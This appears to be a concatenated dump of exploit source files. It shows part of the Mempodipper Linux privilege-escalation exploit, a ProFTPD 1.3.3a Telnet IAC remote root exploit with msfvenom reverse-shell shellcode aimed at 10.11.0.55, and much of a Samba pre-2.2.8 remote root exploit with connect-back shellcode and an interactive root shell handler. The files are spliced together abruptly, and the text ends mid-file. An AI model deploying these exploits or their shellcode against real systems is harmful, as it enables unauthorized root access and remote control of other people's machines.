174 | if (!address) {
175 | printf("[-] Ptrace failed.\n");
176 | printf("[+] Reading su binary with objdump to find exit@plt.\n");
177 | address = objdump_address();
178 | if (address == ULONG_MAX || !address) {
179 | printf("[-] Could not resolve %s. Specify the exit@plt function address manually.\n",
180 | exploit_prog_path);
181 | printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", prog_name, prog_name);
182 | exit(-1);
183 | }
184 | }
185 | printf("[+] Resolved call address to 0x%lx.\n", address);
186 | return address;
187 | }
188 |
189 | int su_padding()
190 | {
191 | printf("[+] Calculating su padding for [%s]\n", exploit_prog_path);
192 | char cmdbuf[256];
193 | snprintf(cmdbuf, sizeof(cmdbuf), "%s this-entry-does-not-exist 2>&1", exploit_prog_path);
194 | FILE *command = popen(cmdbuf, "r");
195 | if (!command) {
196 | perror("[-] popen");
197 | exit(1);
198 | }
199 | char result[256];
200 | fgets(result, 256, command);
201 | pclose(command);
202 | return strstr(result, "this-entry-does-not-exist") - result;
203 | }
204 |
205 | int child(int sock)
206 | {
207 | char parent_mem[256];
208 | sprintf(parent_mem, "/proc/%d/mem", getppid());
209 | printf("[+] Opening parent mem %s in child.\n", parent_mem);
210 | int fd = open(parent_mem, O_RDWR);
211 | if (fd < 0) {
212 | perror("[-] open");
213 | return 1;
214 | }
215 | printf("[+] Sending fd %d to parent.\n", fd);
216 | send_fd(sock, fd);
217 | return 0;
218 | }
219 |
220 | int parent(unsigned long address)
221 | {
222 | if(!address)
223 | {
224 | address = find_address();
225 | }
226 | int sockets[2];
227 | printf("[+] Opening socketpair.\n");
228 | if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) {
229 | perror("[-] socketpair");
230 | return 1;
231 | }
232 | if (fork()) {
233 | printf("[+] Waiting for transferred fd in parent.\n");
234 | int fd = recv_fd(sockets[1]);
235 | printf("[+] Received fd at %d.\n", fd);
236 | if (fd < 0) {
237 | perror("[-] recv_fd");
238 | return 1;
239 | }
240 | printf("[+] Assigning fd %d to stderr.\n", fd);
241 | dup2(2, 15);
242 | dup2(fd, 2);
243 | int padding = su_padding(exploit_prog_path);
244 | unsigned long offset = address - padding;
245 | printf("[+] Seeking to offset 0x%lx. padding [%d]\n", offset, padding);
246 | lseek64(fd, offset, SEEK_SET);
247 |
248 | #if defined(__i386__)
249 | // See shellcode-32.s in this package for the source.
250 | char shellcode[] =
251 | "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
252 | "\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
253 | "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
254 | "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
255 | "\x80";
256 | #elif defined(__x86_64__)
257 | // See shellcode-64.s in this package for the source.
258 | char shellcode[] =
259 | "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48"
260 | "\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f"
261 | "\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7"
262 | "\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50"
263 | "\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
264 | #else
265 | #error "That platform is not supported."
266 | #endif
267 | printf("[+] Executing %s with shellcode.\n", exploit_prog_name);
268 | execl(exploit_prog_path, exploit_prog_name, shellcode, NULL);
269 | } else {
270 | char sock[32];
271 | sprintf(sock, "%d", sockets[0]);
272 | printf("[+] Executing child from child fork.\n");
273 | execl("/proc/self/exe", prog_name, "-c", sock, NULL);
274 | }
275 | return 0;
276 | }
277 |
278 | int main(int argc, char **argv)
279 | {
280 | #define NEED_ADDR (0x1)
281 | #define NEED_PROG (0x2)
282 |
283 | prog_name = argv[0];
284 | unsigned long address = 0;
285 | unsigned int flags = 0;
286 | int i;
287 | if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c')
288 | return child(atoi(argv[2]));
289 |
290 | printf("===============================\n");
291 | printf("= Mempodipper =\n");
292 | printf("= by zx2c4 =\n");
293 | printf("= Jan 21, 2012 =\n");
294 | printf("===============================\n\n");
295 |
296 | for(i = 1; i < argc; ++i)
297 | {
298 | if(argv[i][0] == '-')
299 | {
300 | switch(argv[i][1])
301 | {
302 | case 'o':
303 | if(flags)
304 | goto exploit;
305 | flags = NEED_ADDR;
306 | break;
307 | case 'p':
308 | if(flags) goto exploit;
309 | flags = NEED_PROG;
310 | break;
311 | default:
312 | flags = 0;
313 | }
314 | }
315 | else if(flags & NEED_ADDR)
316 | {
317 | flags = 0;
318 | address = strtoul(argv[i], NULL, 16);
319 | }
320 | else if(flags & NEED_PROG)
321 | {
322 | flags = 0;
323 | exploit_prog_path = argv[i];
324 | exploit_prog_name = strrchr(exploit_prog_path, '/');
325 | if(!exploit_prog_name)
326 | exploit_prog_name = exploit_prog_path;
327 | else ++exploit_prog_name;
328 | }
329 | }
330 |
331 | exploit:
332 | return parent(address);
333 |
334 | }
335 |
--------------------------------------------------------------------------------
/xpl/proftpd_1_3_3_a.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | ##
3 | ##//#############################################################################################################
4 | ## ## #
5 | ## Vulnerability: ProFTPD IAC Remote Root Exploit ## Telnet IAC Buffer Overflow (Linux) #
6 | ## ## ProFTPD 1.3.2rc3 #
7 | ## Vulnerable Application: ProFTPD 1.3.3a ## This is a part of the Metasploit Module, #
8 | ## Tested on Linux 2.6.32-5-686 ## exploit/linux/ftp/proftp_telnet_iac #
9 | ## ## #
10 | ## Author: Muhammad Haidari ## Spawns a reverse shell to 10.11.0.55:1234 #
11 | ## Contact: ghmh@outlook.com ## #
12 | ## Website: www.github.com/muhammd ## #
13 | ## ## #
14 | ##//#############################################################################################################
15 | ##
16 | ##
17 | ## TODO: adjust
18 | ##
19 | ## Usage: python ProFTPD_exploit.py
20 |
21 | import sys,os,socket
22 | import struct
23 |
24 | #msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.44 LPORT=8080 CMD=/bin/sh PrependChrootBreak=true --smallest -f python -v payload -b '\x09\x0a\x0b\x0c\x0d\x20\xff'
25 |
26 | payload = ""
27 | payload += "\xb8\xf0\x5e\xe0\x8e\xd9\xce\xd9\x74\x24\xf4\x5f"
28 | payload += "\x2b\xc9\xb1\x1e\x31\x47\x12\x83\xef\xfc\x03\xb7"
29 | payload += "\x50\x02\x7b\x06\xa4\xf3\x5f\x02\x70\xac\x92\x52"
30 | payload += "\x16\x71\xa4\xb1\x8d\xae\xee\xf8\xd2\x38\xd7\x5a"
31 | payload += "\x1e\xba\xd9\x9a\xf0\xdd\x71\x34\xdf\xa8\x61\x22"
32 | payload += "\x22\xf2\xd5\xbe\x91\x84\xf4\x44\x43\xb8\x71\x61"
33 | payload += "\xcc\x0f\x01\xa0\x36\x78\xe1\x91\x8b\xd4\x8c\x17"
34 | payload += "\x85\x3a\xe0\x71\x58\x3c\x92\x24\xd2\x02\x58\x56"
35 | payload += "\x5b\x04\x9b\x3e\x56\xfd\x5b\x92\x0e\x03\x5c\xf5"
36 | payload += "\x5e\x8a\xbd\xb9\x39\xdd\x6c\xea\x76\xde\x07\xed"
37 | payload += "\xb4\x61\x45\x85\x28\x4d\x19\x3d\xdd\xbe\xf2\xdf"
38 | payload += "\x74\x48\xef\x4d\xd4\xc3\x11\xc1\xd1\x1e\x51"
39 |
40 | #payload = ""
41 | #payload += "\x6a\x1d\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
42 | #payload += "\x13\x34\x38\x49\xe4\x83\xeb\xfc\xe2\xf4\x05\xf1"
43 | #payload += "\x78\x3f\x5e\x7e\x11\x29\xb4\x52\x74\x6d\xd7\x52"
44 | #payload += "\x6e\xbc\xf9\xb8\xc0\x3d\x6c\xf5\xc9\xd5\xf4\x68"
45 | #payload += "\x2f\x8c\x1a\x16\xc0\x07\x5e\x05\x10\x54\x38\xf5"
46 | #payload += "\xc9\x06\xce\x52\x74\x6d\xed\x60\x84\x64\x05\xe3"
47 | #payload += "\xbe\x07\x67\x7b\x1a\x8e\x36\xb1\xa8\x54\x52\xf5"
48 | #payload += "\xc9\x77\x6d\x88\x76\x29\xb4\x71\x30\x1d\x5c\x32"
49 | #payload += "\x42\xe4\x03\x50\x4b\xe4\x30\xea\xc0\x05\x84\x5e"
50 | #payload += "\x19\xb5\x67\x8b\x4a\x6d\xd5\xf5\xc9\xb6\x5c\x56"
51 | #payload += "\x66\x97\x5c\x50\x66\xcb\x56\x51\xc0\x07\x66\x6b"
52 | #payload += "\xc0\x05\x84\x33\x84\x64"
53 |
54 | # NOTE: All addresses are from the proftpd binary
55 | IACCount = 4096+16
56 | Offset = 0x102c-4
57 | Ret = "0x805a547" # pop esi / pop ebp / ret
58 | Writable = "0x80e81a0" # .data
59 |
60 | if len(sys.argv) < 2:
61 | print "\nUsage: " + sys.argv[0] + " \n"
62 | sys.exit()
63 |
64 | rop = struct.pack("
25 | #include
26 | #include
27 | #include
28 | #include
29 | #include
30 | #include
31 | #include
32 | #include
33 | #include
34 | #include
35 | #include
36 | #include
37 | #include
38 | #include
39 | #include
40 | #include
41 |
42 | char
43 | linux_connect_back[] =
44 | /* fork(), execve sh -c [client] [host to bounce to], term=xterm */
45 | "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50"
46 | "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
47 | "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
48 | "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
49 | "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68"
50 | "\x2d\x63\x89\xe3\x50\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50"
51 | "\x89\xe1\x31\xc0\x50\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68"
52 | "\x54\x45\x52\x4d\x89\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73"
53 | "\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80\x31\xc0\xb0"
54 | "\x01\xcd\x80"
55 |
56 | /* connect back shellcode (port=0xb0ef) */
57 | "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
58 | "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"
59 | "\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3"
60 | "\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
61 | "\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
62 | "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
63 | "\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f"
64 | "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
65 | "\x01\xcd\x80";
66 |
67 | char
68 | bsd_connect_back[] =
69 | /* fork(), execve sh -c [client] [host to bounce to], term=xterm */
70 | "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50"
71 | "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
72 | "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
73 | "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
74 | "\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68\x2d\x63\x89\xe3\x50"
75 | "\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50\x89\xe1\x31\xc0\x50"
76 | "\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68\x54\x45\x52\x4d\x89"
77 | "\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
78 | "\x69\x89\xe3\x50\x52\x51\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0"
79 | "\x01\xcd\x80"
80 |
81 | /* connect back shellcode (port=0xb0ef) */
82 | "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
83 | "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef"
84 | "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0"
85 | "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80"
86 | "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52"
87 | "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31"
88 | "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
89 | "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
90 |
91 | typedef struct {
92 | unsigned char type;
93 | unsigned char flags;
94 | unsigned short length;
95 | } NETBIOS_HEADER;
96 |
97 | typedef struct {
98 | unsigned char protocol[4];
99 | unsigned char command;
100 | unsigned short status;
101 | unsigned char reserved;
102 | unsigned char flags;
103 | unsigned short flags2;
104 | unsigned char pad[12];
105 | unsigned short tid;
106 | unsigned short pid;
107 | unsigned short uid;
108 | unsigned short mid;
109 | } SMB_HEADER;
110 |
111 | pid_t childs[50];
112 | int LOOP = 1;
113 | struct sockaddr_in serv_addr;
114 | int sock_listen, client;
115 | int exploit_pid;
116 | int listen_pid;
117 | int port_listen = 45295;
118 |
119 | void
120 | usage(char *prog)
121 | {
122 | int i;
123 |
124 | fprintf(stdout, "Samba < 2.2.8 Remote Root exploit by Schizoprenic\n"
125 | "Connect back method, Xnuxer-Labs, 2003.\n"
126 | "Usage : %s \n"
127 | "Targets:\n"
128 | " 0 = Linux\n"
129 | " 1 = FreeBSD/NetBSD\n"
130 | " 2 = OpenBSD 3.0 and prior\n"
131 | " 3 = OpenBSD 3.2 - non-exec stack\n\n", prog);
132 | exit(1);
133 | }
134 |
135 | int
136 | Connect(int fd, char *ip, unsigned int port, unsigned int time_out)
137 | {
138 | /* ripped from no1 */
139 |
140 | int flags;
141 | int select_status;
142 | fd_set connect_read, connect_write;
143 | struct timeval timeout;
144 | int getsockopt_length = 0;
145 | int getsockopt_error = 0;
146 | struct sockaddr_in server;
147 | bzero(&server, sizeof(server));
148 | server.sin_family = AF_INET;
149 | inet_pton(AF_INET, ip, &server.sin_addr);
150 | server.sin_port = htons(port);
151 |
152 | if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
153 | close(fd);
154 | return -1;
155 | }
156 |
157 | if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
158 | close(fd);
159 | return -1;
160 | }
161 |
162 | timeout.tv_sec = time_out;
163 | timeout.tv_usec = 0;
164 | FD_ZERO(&connect_read);
165 | FD_ZERO(&connect_write);
166 | FD_SET(fd, &connect_read);
167 | FD_SET(fd, &connect_write);
168 |
169 | if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) {
170 | if(errno != EINPROGRESS) {
171 | close(fd);
172 | return -1;
173 | }
174 | }
175 | else {
176 | if(fcntl(fd, F_SETFL, flags) < 0) {
177 | close(fd);
178 | return -1;
179 | }
180 |
181 | return 1;
182 |
183 | }
184 |
185 | select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);
186 |
187 | if(select_status == 0) {
188 | close(fd);
189 | return -1;
190 |
191 | }
192 |
193 | if(select_status == -1) {
194 | close(fd);
195 | return -1;
196 | }
197 |
198 | if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) {
199 | if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write)) {
200 | getsockopt_length = sizeof(getsockopt_error);
201 |
202 | if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) {
203 | errno = ETIMEDOUT;
204 | close(fd);
205 | return -1;
206 | }
207 |
208 | if(getsockopt_error == 0) {
209 | if(fcntl(fd, F_SETFL, flags) < 0) {
210 | close(fd);
211 | return -1;
212 | }
213 | return 1;
214 | }
215 |
216 | else {
217 | errno = getsockopt_error;
218 | close(fd);
219 | return (-1);
220 | }
221 |
222 | }
223 | }
224 | else {
225 | close(fd);
226 | return 1;
227 | }
228 |
229 | if(fcntl(fd, F_SETFL, flags) < 0) {
230 | close(fd);
231 | return -1;
232 | }
233 | return 1;
234 | }
235 |
236 | int
237 | read_timer(int fd, unsigned int time_out)
238 | {
239 |
240 | /* ripped from no1 */
241 |
242 | int flags;
243 | int select_status;
244 | fd_set fdread;
245 | struct timeval timeout;
246 |
247 | if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
248 | close(fd);
249 | return (-1);
250 | }
251 |
252 | if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
253 | close(fd);
254 | return (-1);
255 | }
256 |
257 | timeout.tv_sec = time_out;
258 | timeout.tv_usec = 0;
259 | FD_ZERO(&fdread);
260 | FD_SET(fd, &fdread);
261 | select_status = select(fd + 1, &fdread, NULL, NULL, &timeout);
262 |
263 | if(select_status == 0) {
264 | close(fd);
265 | return (-1);
266 | }
267 |
268 | if(select_status == -1) {
269 | close(fd);
270 | return (-1);
271 | }
272 |
273 | if(FD_ISSET(fd, &fdread)) {
274 |
275 | if(fcntl(fd, F_SETFL, flags) < 0) {
276 | close(fd);
277 | return -1;
278 | }
279 |
280 | return 1;
281 |
282 | }
283 | else {
284 | close(fd);
285 | return 1;
286 |
287 | }
288 | }
289 |
290 | int
291 | write_timer(int fd, unsigned int time_out)
292 | {
293 |
294 | /* ripped from no1 */
295 |
296 | int flags;
297 | int select_status;
298 | fd_set fdwrite;
299 | struct timeval timeout;
300 |
301 | if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
302 | close(fd);
303 | return (-1);
304 | }
305 |
306 | if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
307 | close(fd);
308 | return (-1);
309 | }
310 |
311 | timeout.tv_sec = time_out;
312 | timeout.tv_usec = 0;
313 | FD_ZERO(&fdwrite);
314 | FD_SET(fd, &fdwrite);
315 |
316 | select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout);
317 |
318 | if(select_status == 0) {
319 | close(fd);
320 | return -1;
321 | }
322 |
323 | if(select_status == -1) {
324 | close(fd);
325 | return -1;
326 | }
327 |
328 | if(FD_ISSET(fd, &fdwrite)) {
329 | if(fcntl(fd, F_SETFL, flags) < 0) {
330 | close(fd);
331 | return -1;
332 | }
333 | return 1;
334 | }
335 | else {
336 | close(fd);
337 | return -1;
338 | }
339 | }
340 |
341 | int
342 | start_session(int sock)
343 | {
344 | char buffer[1000];
345 | char response[4096];
346 | char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";
347 | char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79"
348 | "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";
349 |
350 | NETBIOS_HEADER *netbiosheader;
351 | SMB_HEADER *smbheader;
352 |
353 | memset(buffer, 0x00, sizeof(buffer));
354 |
355 | netbiosheader = (NETBIOS_HEADER *)buffer;
356 | smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
357 |
358 | netbiosheader->type = 0x00; /* session message */
359 | netbiosheader->flags = 0x00;
360 | netbiosheader->length = htons(0x2E);
361 |
362 | smbheader->protocol[0] = 0xFF;
363 | smbheader->protocol[1] = 'S';
364 | smbheader->protocol[2] = 'M';
365 | smbheader->protocol[3] = 'B';
366 | smbheader->command = 0x73; /* session setup */
367 | smbheader->flags = 0x08; /* caseless pathnames */
368 | smbheader->flags2 = 0x01; /* long filenames supported */
369 | smbheader->pid = getpid() & 0xFFFF;
370 | smbheader->uid = 100;
371 | smbheader->mid = 0x01;
372 |
373 | memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1);
374 |
375 | if(write_timer(sock, 3) == 1)
376 | if (send(sock, buffer, 50, 0) < 0) return -1;
377 |
378 | memset(response, 0x00, sizeof(response));
379 |
380 | if (read_timer(sock, 3) == 1)
381 | if (read(sock, response, sizeof(response) - 1) < 0) return -1;
382 |
383 | netbiosheader = (NETBIOS_HEADER *)response;
384 | smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));
385 |
386 | //if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non session message\n");
387 |
388 | netbiosheader = (NETBIOS_HEADER *)buffer;
389 | smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
390 |
391 | memset(buffer, 0x00, sizeof(buffer));
392 |
393 | netbiosheader->type = 0x00; /* session message */
394 | netbiosheader->flags = 0x00;
395 | netbiosheader->length = htons(0x3C);
396 |
397 | smbheader->protocol[0] = 0xFF;
398 | smbheader->protocol[1] = 'S';
399 | smbheader->protocol[2] = 'M';
400 | smbheader->protocol[3] = 'B';
401 | smbheader->command = 0x70; /* start connection */
402 | smbheader->pid = getpid() & 0xFFFF;
403 | smbheader->tid = 0x00;
404 | smbheader->uid = 100;
405 |
406 | memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1);
407 |
408 | if(write_timer(sock, 3) == 1)
409 | if (send(sock, buffer, 64, 0) < 0) return -1;
410 |
411 | memset(response, 0x00, sizeof(response));
412 |
413 | if (read_timer(sock, 3) == 1)
414 | if (read(sock, response, sizeof(response) - 1) < 0) return -1;
415 |
416 | netbiosheader = (NETBIOS_HEADER *)response;
417 | smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));
418 |
419 | if (netbiosheader->type != 0x00) return -1;
420 |
421 | return 0;
422 | }
423 |
424 | int
425 | exploit_normal(int sock, unsigned long ret, char *shellcode)
426 | {
427 |
428 | char buffer[4000];
429 | char exploit_data[] =
430 | "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
431 | "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
432 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
433 | "\x00\x00\x00\x90";
434 |
435 | int i = 0;
436 | unsigned long dummy = ret - 0x90;
437 |
438 | NETBIOS_HEADER *netbiosheader;
439 | SMB_HEADER *smbheader;
440 |
441 | memset(buffer, 0x00, sizeof(buffer));
442 |
443 | netbiosheader = (NETBIOS_HEADER *)buffer;
444 | smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
445 |
446 | netbiosheader->type = 0x00; /* session message */
447 | netbiosheader->flags = 0x04;
448 | netbiosheader->length = htons(2096);
449 |
450 | smbheader->protocol[0] = 0xFF;
451 | smbheader->protocol[1] = 'S';
452 | smbheader->protocol[2] = 'M';
453 | smbheader->protocol[3] = 'B';
454 | smbheader->command = 0x32; /* SMBtrans2 */
455 | smbheader->tid = 0x01;
456 | smbheader->uid = 100;
457 |
458 | memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);
459 |
460 | buffer[1096] = 0xEB;
461 | buffer[1097] = 0x70;
462 |
463 | for (i = 0; i < 4 * 24; i += 8) {
464 | memcpy(buffer + 1099 + i, &dummy, 4);
465 | memcpy(buffer + 1103 + i, &ret, 4);
466 | }
467 |
468 | memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
469 | exploit_data, sizeof(exploit_data) - 1);
470 | memcpy(buffer + 1800, shellcode, strlen(shellcode));
471 |
472 | if(write_timer(sock, 3) == 1) {
473 | if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
474 | return 0;
475 | }
476 |
477 | return -1;
478 | }
479 |
480 | int
481 | exploit_openbsd32(int sock, unsigned long ret, char *shellcode)
482 | {
483 | char buffer[4000];
484 |
485 | char exploit_data[] =
486 | "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
487 | "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
488 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
489 | "\x00\x00\x00\x90";
490 |
491 | int i = 0;
492 | unsigned long dummy = ret - 0x30;
493 | NETBIOS_HEADER *netbiosheader;
494 | SMB_HEADER *smbheader;
495 |
496 | memset(buffer, 0x00, sizeof(buffer));
497 |
498 | netbiosheader = (NETBIOS_HEADER *)buffer;
499 | smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
500 |
501 | netbiosheader->type = 0x00; /* session message */
502 | netbiosheader->flags = 0x04;
503 | netbiosheader->length = htons(2096);
504 |
505 | smbheader->protocol[0] = 0xFF;
506 | smbheader->protocol[1] = 'S';
507 | smbheader->protocol[2] = 'M';
508 | smbheader->protocol[3] = 'B';
509 | smbheader->command = 0x32; /* SMBtrans2 */
510 | smbheader->tid = 0x01;
511 | smbheader->uid = 100;
512 |
513 | memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);
514 |
515 | for (i = 0; i < 4 * 24; i += 4)
516 | memcpy(buffer + 1131 + i, &dummy, 4);
517 |
518 | memcpy(buffer + 1127, &ret, 4);
519 |
520 | memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
521 | exploit_data, sizeof(exploit_data) - 1);
522 |
523 | memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode));
524 |
525 | if(write_timer(sock, 3) == 1) {
526 | if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
527 | return 0;
528 | }
529 |
530 | return -1;
531 | }
532 |
533 |
534 | void shell(int sock)
535 | {
536 | fd_set fd_read;
537 | char buff[1024], *cmd="uname -a;id;\n";
538 | int n;
539 |
540 | send(sock, cmd, strlen(cmd), 0);
541 |
542 | while(1) {
543 | FD_SET(sock,&fd_read);
544 | FD_SET(0,&fd_read);
545 |
546 | if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
547 |
548 | if( FD_ISSET(sock, &fd_read) ) {
549 | n=read(sock,buff,sizeof(buff));
550 | if (n == 0) {
551 | printf ("Connection closed.\n");
552 | exit(EXIT_FAILURE);
553 | } else if (n < 0) {
554 | perror("read remote");
555 | exit(EXIT_FAILURE);
556 | }
557 | write(1,buff,n);
558 | }
559 |
560 | if ( FD_ISSET(0, &fd_read) ) {
561 | if((n=read(0,buff,sizeof(buff)))<=0){
562 | perror ("read user");
563 | exit(EXIT_FAILURE);
564 | }
565 | write(sock,buff,n);
566 | }
567 | }
568 | close(sock);
569 | }
570 |
571 | void GoAway()
572 | {
573 | exit(0);
574 | }
575 |
576 | void start_listen()
577 | {
578 | FILE *fstat;
579 | int cpid;
580 |
581 | LISTENER:
582 |
583 | bzero(&serv_addr, sizeof(serv_addr));
584 | serv_addr.sin_family=2;
585 | serv_addr.sin_addr.s_addr=0;
586 | serv_addr.sin_port=htons(port_listen);
587 | sock_listen=socket(2,1,6);
588 |
589 | if(bind(sock_listen,(struct sockaddr *)&serv_addr,16))
590 | {
591 | port_listen++;
592 | goto LISTENER;
593 | }
594 |
595 | if(listen(sock_listen,1))
596 | {
597 | perror("listen");
598 | exit(1);
599 | }
600 |
601 | fprintf(stdout, "[+] Listen on port: %d\n",port_listen);
602 |
603 | cpid = fork();
604 |
605 | if (cpid) {
606 | client=accept(sock_listen,0,0);
607 | LOOP = 0;
608 | kill(SIGUSR2, exploit_pid);
609 | if (client > 0) {
610 | fprintf(stdout, "[+] Yeah, I have a root ....!\n"
611 | "------------------------------\n");
612 | fstat=fopen(".ROOT", "a"); //needed by mass.c
613 | fclose(fstat);
614 | shell(client);
615 | }
616 | exit(0);
617 | }
618 | }
619 |
620 | int
621 | main (int argc,char *argv[])
622 | {
623 | char *shellcode = NULL;
624 | int typeos = -1;
625 | int port = 139;
626 | int sock = 0;
627 | int i = 0;
628 | int status = 0;
629 | int m = 0;
630 | int ip1 = 0;
631 | int ip2 = 0;
632 | int ip3 = 0;
633 | int ip4 = 0;
634 | int sta = 0;
635 | int STEPS = 512;
636 | int ENDLOOP = 64;
637 | char *desc;
638 | unsigned long MAX_CHILDS = 40;
639 | unsigned long ret = 0x0;
640 | unsigned short int a_port;
641 | struct sockaddr_in addr1;
642 | struct hostent *he;
643 | struct stat st;
644 |
645 | if (argc != 4) usage(argv[0]);
646 |
647 | typeos = atoi(argv[1]);
648 | if (typeos > 3) {
